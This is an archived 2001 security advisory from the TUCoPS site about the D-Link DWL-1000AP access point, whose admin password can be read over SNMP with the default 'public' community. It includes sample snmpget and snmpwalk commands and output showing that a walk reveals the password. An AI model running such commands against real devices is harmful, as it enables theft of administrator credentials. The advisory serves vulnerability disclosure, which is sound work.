Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Network Appliances :: napl4955.htm

D-Link public snmp reveals admin password
24th Dec 2001 [SBWID-4955]

	D-Link public snmp reveals admin password


	D-Link DWL-1000AP


	Jonathan Strine reported :

	Admin  password  is  readable  via  SNMP  \"public\"  community  in  OID as a string value

	 Update (25 January 2002)



	Sample exploit :

	The bug in the access point only reveals the password if you call for it by

	doing a snmp walk which uses a next request to get the oid instead of

	calling it explicitly.  I tried:


	#snmpget public enterprises.937.

	enterprises.937. = \"\"


	#snmpwalk public enterprises.937.

	enterprises.937. = \"\"


	Both explicit calls to the oid fail but if I use next to call that oid I get


	#snmpwalk public enterprises.937.

	enterprises.937. = \"mypw\"



	Vendors sees no problem

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH